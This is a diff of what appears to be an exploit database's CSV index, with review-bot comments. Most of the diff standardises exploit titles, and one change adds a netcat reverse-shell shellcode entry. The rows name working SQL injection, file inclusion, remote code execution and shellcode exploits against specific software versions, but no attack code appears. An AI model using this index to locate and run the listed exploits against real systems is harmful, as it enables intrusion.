@@ -15730,6 +15739,7 @@ id,file,description,date,author,platform,type,port 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse Shell TCP Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0 40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download & Execute Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Netcat (-e option disabled) Reverse Shell Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 
@@ -15976,7 +15986,7 @@ id,file,description,date,author,platform,type,port 1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - (cfgIncludeDirectory) Remote Command Execution",2006-02-16,cijfer,php,webapps,0 1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0 -1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - (csscontent) Remote Code Execution",2006-02-17,RusH,php,webapps,0 +1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Parameter Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0 1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 
@@ -16295,7 +16305,7 @@ id,file,description,date,author,platform,type,port 2019,platforms/php/webapps/2019.txt,"mail2forum phpBB Mod 1.2 - (m2f_root_path) Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 2020,platforms/php/webapps/2020.txt,"Mambo Component com_videodb 0.3en - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 2021,platforms/php/webapps/2021.txt,"Mambo Component SMF Forum 1.3.1.3 - Remote File Inclusion",2006-07-17,ASIANEAGLE,php,webapps,0 -2022,platforms/php/webapps/2022.txt,"Mambo Component 'com_extcalendar' 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 +2022,platforms/php/webapps/2022.txt,"Mambo Component ExtCalendar 2.0 - Remote File Inclusion",2006-07-17,OLiBekaS,php,webapps,0 2023,platforms/php/webapps/2023.txt,"Mambo Component com_loudmouth 4.0j - Remote File Inclusion",2006-07-17,h4ntu,php,webapps,0 2024,platforms/php/webapps/2024.txt,"Mambo Component pc_cookbook 0.3 - Remote File Inclusion",2006-07-17,Matdhule,php,webapps,0 2025,platforms/php/webapps/2025.txt,"Mambo Component perForms 1.0 - Remote File Inclusion",2006-07-17,endeneu,php,webapps,0 
@@ -16434,7 +16444,7 @@ id,file,description,date,author,platform,type,port 2221,platforms/php/webapps/2221.txt,"Fantastic News 2.1.3 - (script_path) Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 2222,platforms/php/webapps/2222.txt,"Mambo Component com_lurm_constructor 0.6b - Remote File Inclusion",2006-08-19,mdx,php,webapps,0 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat 3.1 - 'adminlog' Remote File Inclusion",2006-08-19,SHiKaA,php,webapps,0 -2225,platforms/php/webapps/2225.txt,"Mambo Component com_babackup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 +2225,platforms/php/webapps/2225.txt,"Mambo Component bigAPE-Backup 1.1 - File Inclusion",2006-08-19,mdx,php,webapps,0 2226,platforms/php/webapps/2226.txt,"NES Game and NES System c108122 - File Inclusion",2006-08-20,Kacper,php,webapps,0 2227,platforms/php/webapps/2227.txt,"SportsPHool 1.0 - (mainnav) Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 
@@ -17071,7 +17081,7 @@ id,file,description,date,author,platform,type,port 3066,platforms/asp/webapps/3066.txt,"NewsCMSLite - 'newsCMS.mdb' Remote Password Disclosure",2007-01-01,KaBuS,asp,webapps,0 3068,platforms/asp/webapps/3068.htm,"TaskTracker 1.5 - (Customize.asp) Remote Add Administrator Exploit",2007-01-01,ajann,asp,webapps,0 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0 -3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0 +3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' Parameter SQL Injection",2007-01-03,ajann,asp,webapps,0 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0 3079,platforms/php/webapps/3079.txt,"Aratix 0.2.2b11 - (inc/init.inc.php) Remote File Inclusion",2007-01-04,nuffsaid,php,webapps,0 
@@ -17354,7 +17364,7 @@ id,file,description,date,author,platform,type,port 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0 -3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component 'com_swmenupro' 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 +3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3562,platforms/php/webapps/3562.txt,"Net-Side.net CMS - (index.php cms) Remote File Inclusion",2007-03-24,Sharingan,php,webapps,0 
@@ -17445,7 +17455,7 @@ id,file,description,date,author,platform,type,port 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution",2007-04-10,BlackHawk,php,webapps,0 -3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component 'com_thopper' 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 +3703,platforms/php/webapps/3703.txt,"Joomla! / Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-PHP Beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 3705,platforms/php/webapps/3705.txt,"SimpCMS 04.10.2007 - (site) Remote File Inclusion",2007-04-10,Dr.RoVeR,php,webapps,0 3706,platforms/php/webapps/3706.txt,"Mambo Component zOOm Media Gallery 2.5 Beta 2 - Remote File Inclusion",2007-04-11,iskorpitx,php,webapps,0 
@@ -17469,7 +17479,7 @@ id,file,description,date,author,platform,type,port 3733,platforms/php/webapps/3733.txt,"Pixaria Gallery 1.x - (class.Smarty.php) Remote File Inclusion",2007-04-14,irvian,php,webapps,0 3734,platforms/php/webapps/3734.txt,"Joomla! Component module autostand 1.0 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3735,platforms/php/webapps/3735.txt,"LS Simple Guestbook 1.0 - Remote Code Execution",2007-04-14,Gammarays,php,webapps,0 -3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component 'com_articles' 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 +3736,platforms/php/webapps/3736.txt,"Joomla! / Mambo Component New Article 1.1 - Remote File Inclusion",2007-04-14,"Cold Zero",php,webapps,0 3739,platforms/php/webapps/3739.php,"Papoo 3.02 - (kontakt menuid) SQL Injection",2007-04-15,Kacper,php,webapps,0 3741,platforms/php/webapps/3741.txt,"CNStats 2.9 - (who_r.php bj) Remote File Inclusion",2007-04-15,irvian,php,webapps,0 3742,platforms/php/webapps/3742.pl,"NMDeluxe 1.0.1 - (footer.php template) Local File Inclusion",2007-04-15,BeyazKurt,php,webapps,0 
@@ -17775,7 +17785,7 @@ id,file,description,date,author,platform,type,port 4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4258,platforms/php/webapps/4258.txt,"Lanius CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 -4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 +4264,platforms/cgi/webapps/4264.txt,"Cartweaver 2.16.11 - 'ProdID' Parameter SQL Injection",2007-08-06,meoconx,cgi,webapps,0 4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 
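Review bot: Row 4264 gains a version, "Cartweaver 2.16.11", that the old title did not carry, and nothing in the hunk shows where it comes from; it also loses the file name Details.cfm. Please state the source of the version in the commit message, and consider keeping the file in the title, since the context row 4265 still names its file ('Directory.php cat').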
@@ -18051,7 +18061,7 @@ id,file,description,date,author,platform,type,port 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 4687,platforms/asp/webapps/4687.htm,"Snitz Forums 2000 - Active.asp SQL Injection",2007-12-03,BugReport.IR,asp,webapps,0 -4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component 'com_rsgallery' 2.0b5 - 'catid' SQL Injection",2007-12-05,K-159,php,webapps,0 +4691,platforms/php/webapps/4691.txt,"Joomla! / Mambo Component rsgallery 2.0b5 - 'catid' Parameter SQL Injection",2007-12-05,K-159,php,webapps,0 4693,platforms/php/webapps/4693.txt,"SineCMS 2.3.4 - Calendar SQL Injection",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"EZContents 1.4.5 - (index.php link) Remote File Disclosure",2007-12-05,p4imi0,php,webapps,0 4695,platforms/php/webapps/4695.txt,"WordPress Plugin PictPress 0.91 - Remote File Disclosure",2007-12-05,GoLd_M,php,webapps,0 
@@ -18091,7 +18101,7 @@ id,file,description,date,author,platform,type,port 4750,platforms/php/webapps/4750.txt,"PHPMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0 4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Arbitrary File Upload",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 -4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - (view.php list) Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 +4758,platforms/php/webapps/4758.txt,"xeCMS 1.x - 'view.php' Remote File Disclosure",2007-12-19,p4imi0,php,webapps,0 4762,platforms/php/webapps/4762.txt,"nicLOR CMS - 'sezione_news.php' SQL Injection",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 - (output) Remote File Inclusion",2007-12-21,CraCkEr,php,webapps,0 4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 - (loadadminpage) Remote File Inclusion",2007-12-21,KnocKout,php,webapps,0 
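Review bot: The rewrite of row 4758 from "(view.php list)" to "'view.php'" silently drops the parameter name list, whereas other hunks in this patch keep the parameter and drop the file (row 5874 goes from "(index.php act)" to "'act' Parameter"). For consistency, and so the vulnerable input stays visible in the index, use "xeCMS 1.x - 'list' Parameter Remote File Disclosure".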
@@ -18372,7 +18382,7 @@ id,file,description,date,author,platform,type,port 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0 -5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0 +5139,platforms/php/webapps/5139.txt,"Mambo Component Portfolio Manager 1.0 - 'categoryId' Parameter SQL Injection",2008-02-18,"it's my",php,webapps,0 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0 5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0 
@@ -18465,7 +18475,7 @@ id,file,description,date,author,platform,type,port 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 -5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0 +5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' Parameter SQL Injection",2008-03-18,n3w7u,php,webapps,0 5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 
@@ -18875,35 +18885,35 @@ id,file,description,date,author,platform,type,port 5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add Admin",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Blind SQL Injection",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injections",2008-06-11,BugReport.IR,php,webapps,0 -5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 -5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 +5789,platforms/php/webapps/5789.pl,"JAMM CMS - 'id' Parameter Blind SQL Injection",2008-06-11,anonymous,php,webapps,0 +5791,platforms/php/webapps/5791.txt,"Gravity Board X 2.0 Beta - SQL Injection / Cross-Site Scripting",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC - Multiple Local File Inclusion",2008-06-12,"CWH Underground",php,webapps,0 5794,platforms/php/webapps/5794.pl,"Clever Copy 3.0 - 'results.php' SQL Injection",2008-06-12,anonymous,php,webapps,0 -5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection",2008-06-12,TheDefaced,php,webapps,0 -5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 +5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - 'detail' Parameter SQL Injection",2008-06-12,TheDefaced,php,webapps,0 +5797,platforms/php/webapps/5797.txt,"Butterfly ORGanizer 2.0.0 - SQL Injection / Cross-Site Scripting",2008-06-13,"CWH Underground",php,webapps,0 5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin",2008-06-13,"CWH Underground",php,webapps,0 -5799,platforms/php/webapps/5799.pl,"Mambo Component 'com_galleries' 1.0 - 
'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0 +5799,platforms/php/webapps/5799.pl,"Mambo Component Galleries 1.0 - 'aid' Parameter SQL Injection",2008-06-13,Houssamix,php,webapps,0 5800,platforms/php/webapps/5800.pl,"Butterfly ORGanizer 2.0.0 - Arbitrary Delete (Category/Account)",2008-06-13,Stack,php,webapps,0 -5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - (section) Local File Inclusion",2008-06-13,Loader007,php,webapps,0 -5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 -5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0 -5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 +5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 - 'section' Parameter Local File Inclusion",2008-06-13,Loader007,php,webapps,0 +5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - 'tsk_id' Parameter SQL Injection",2008-06-13,"Virangar Security",php,webapps,0 +5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - 'id' Parameter SQL Injection",2008-06-13,K-159,php,webapps,0 +5804,platforms/php/webapps/5804.txt,"Pre ADS Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0 5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0 -5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 +5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'sort' Parameter Blind SQL Injection",2008-06-13,anonymous,php,webapps,0 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - 'Output.php' Remote File Inclusion",2008-06-13,irk4z,php,webapps,0 5809,platforms/php/webapps/5809.txt,"Pre Job Board - 'JobSearch.php' SQL 
Injection",2008-06-14,JosS,php,webapps,0 -5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 +5810,platforms/php/webapps/5810.txt,"Contenido 4.8.4 - Remote File Inclusion / Cross-Site Scripting",2008-06-14,RoMaNcYxHaCkEr,php,webapps,0 5811,platforms/php/webapps/5811.txt,"Family Connections CMS 1.4 - Multiple SQL Injections",2008-06-14,"CWH Underground",php,webapps,0 -5812,platforms/php/webapps/5812.txt,"PHPMyCart - 'shop.php cat' SQL Injection",2008-06-14,anonymous,php,webapps,0 -5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - (page) Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 -5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - (prodId) Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 -5816,platforms/php/webapps/5816.pl,"DIY - (index_topic did) Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 +5812,platforms/php/webapps/5812.txt,"PHPMyCart 1.3 - 'cat' Parameter SQL Injection",2008-06-14,anonymous,php,webapps,0 +5813,platforms/php/webapps/5813.txt,"SHOUTcast Admin Panel 2.0 - 'page' Parameter Local File Inclusion",2008-06-14,"CWH Underground",php,webapps,0 +5815,platforms/php/webapps/5815.pl,"Cartweaver 3 - 'prodId' Parameter Blind SQL Injection",2008-06-14,anonymous,php,webapps,0 +5816,platforms/php/webapps/5816.pl,"DIY - 'did' Parameter Blind SQL Injection",2008-06-14,Mr.SQL,php,webapps,0 5818,platforms/php/webapps/5818.txt,"xeCMS 1.0.0 RC2 - Insecure Cookie Handling",2008-06-14,t0pP8uZz,php,webapps,0 -5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - (Blind SQL Injection / Authentication Bypass) Multiple Vulnerabilities",2008-06-14,t0pP8uZz,php,webapps,0 -5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - (POST) SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 +5819,platforms/php/webapps/5819.txt,"ezcms 1.2 - Blind SQL Injection / Authentication Bypass",2008-06-14,t0pP8uZz,php,webapps,0 
+5820,platforms/php/webapps/5820.txt,"PHPEasyNews 1.13 RC2 - 'POST' Parameter SQL Injection",2008-06-14,t0pP8uZz,php,webapps,0 5821,platforms/php/webapps/5821.txt,"Alstrasoft AskMe Pro 2.1 - Multiple SQL Injections",2008-06-14,t0pP8uZz,php,webapps,0 -5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - (currentfile) Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 +5822,platforms/php/webapps/5822.txt,"Devalcms 1.4a - 'currentfile' Parameter Local File Inclusion",2008-06-15,"CWH Underground",php,webapps,0 5823,platforms/php/webapps/5823.txt,"AWBS 2.7.1 - (news.php viewnews) SQL Injection",2008-06-15,Mr.SQL,php,webapps,0 5824,platforms/php/webapps/5824.txt,"Anata CMS 1.0b5 - (change.php) Arbitrary Add Admin",2008-06-15,"CWH Underground",php,webapps,0 5826,platforms/php/webapps/5826.py,"Simple Machines Forum (SMF) 1.1.4 - SQL Injection",2008-06-15,The:Paradox,php,webapps,0 @@ -18950,7 +18960,7 @@ id,file,description,date,author,platform,type,port 5871,platforms/php/webapps/5871.txt,"FireAnt 1.3 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5872,platforms/php/webapps/5872.txt,"FubarForum 1.5 - 'index.php' Local File Inclusion",2008-06-20,cOndemned,php,webapps,0 5873,platforms/php/webapps/5873.txt,"Lightweight news portal [lnp] 1.0b - Multiple Vulnerabilities",2008-06-20,storm,php,webapps,0 -5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - (index.php act) Local File Inclusion",2008-06-20,storm,php,webapps,0 +5874,platforms/php/webapps/5874.txt,"IPTBB 0.5.6 - 'act' Parameter Local File Inclusion",2008-06-20,storm,php,webapps,0 5875,platforms/php/webapps/5875.txt,"CiBlog 3.1 - (links-extern.php id) SQL Injection",2008-06-20,Mr.SQL,php,webapps,0 5876,platforms/php/webapps/5876.txt,"Jamroom 3.3.5 - Remote File Inclusion",2008-06-20,cyberlog,php,webapps,0 5877,platforms/php/webapps/5877.txt,"jaxultrabb 2.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-20,"CWH Underground",php,webapps,0 
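Review bot: In the hunk starting at -18875, row 5820 changes "(POST) SQL Injection" to "'POST' Parameter SQL Injection", but POST in the old title reads as the HTTP request method, not the name of a parameter, so the mechanical "'x' Parameter" rewrite mislabels it. Suggest "PHPEasyNews 1.13 RC2 - SQL Injection (POST)" or naming the actual parameter from 5820.txt. The same hunk also adds a version to row 5812 ("PHPMyCart 1.3") that the old title did not have; please confirm its source.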
@@ -19008,7 +19018,7 @@ id,file,description,date,author,platform,type,port 5932,platforms/php/webapps/5932.txt,"Webdevindo-CMS 0.1 - (index.php hal) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5933,platforms/php/webapps/5933.txt,"mUnky 0.0.1 - (index.php zone) Local File Inclusion",2008-06-25,StAkeR,php,webapps,0 5934,platforms/php/webapps/5934.txt,"Jokes & Funny Pics Script - (sb_jokeid) SQL Injection",2008-06-25,"Hussin X",php,webapps,0 -5935,platforms/php/webapps/5935.pl,"Mambo Component 'articles' - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 +5935,platforms/php/webapps/5935.pl,"Mambo Component Articles - 'artid' Parameter Blind SQL Injection",2008-06-25,"Ded MustD!e",php,webapps,0 5936,platforms/php/webapps/5936.txt,"Page Manager CMS 2006-02-04 - Arbitrary File Upload",2008-06-25,"CWH Underground",php,webapps,0 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) SQL Injection",2008-06-25,"CWH Underground",php,webapps,0 5938,platforms/php/webapps/5938.php,"PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload",2008-06-25,EgiX,php,webapps,0 
@@ -19047,7 +19057,7 @@ id,file,description,date,author,platform,type,port 5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0 5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0 5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0 -5980,platforms/php/webapps/5980.txt,"Mambo Component 'com_n-gallery' - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 +5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0 5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0 5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 
@@ -19316,7 +19326,7 @@ id,file,description,date,author,platform,type,port 6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 -6369,platforms/php/webapps/6369.py,"devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 +6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'index.php id' Blind SQL Injection",2008-09-05,JosS,php,webapps,0 6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 
